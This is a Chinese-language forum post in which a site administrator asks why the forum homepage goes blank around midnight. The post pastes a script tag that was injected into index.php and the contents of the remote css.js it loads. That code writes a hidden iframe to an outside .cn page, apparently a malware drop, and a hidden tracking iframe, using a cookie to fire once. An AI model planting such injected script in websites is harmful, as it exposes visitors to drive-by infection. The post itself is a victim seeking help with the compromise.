不知道為什麼
每次差不多到了晚上十一點到十二點之間站台上總容易出現錯誤,然後首頁就一片空白
今天像是抓到了這個錯誤,只是不知道為何會這樣子
也就是首頁 index.php 最下面都會自動出現這行代碼
代碼: 選擇全部
?><script language="javascript" src="http://www.css.vu.cx/css.js?width=700&height=600&keyword=uf556"></script>他是出現在 index.php 的
代碼: 選擇全部
page_footer();抓下 css.js 之後打開來看,他的代碼是這樣
代碼: 選擇全部
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write('<iframe src=http://www.rxgsslll.cn/yhyw/2.htm width=50 height=0 border=0></iframe>');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http%3A//css.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";希望前輩可以給予指點
論壇這樣一兩天就掛一次,時間點都差不多,卻又沒有效的解決辦法...
再次感謝幫助



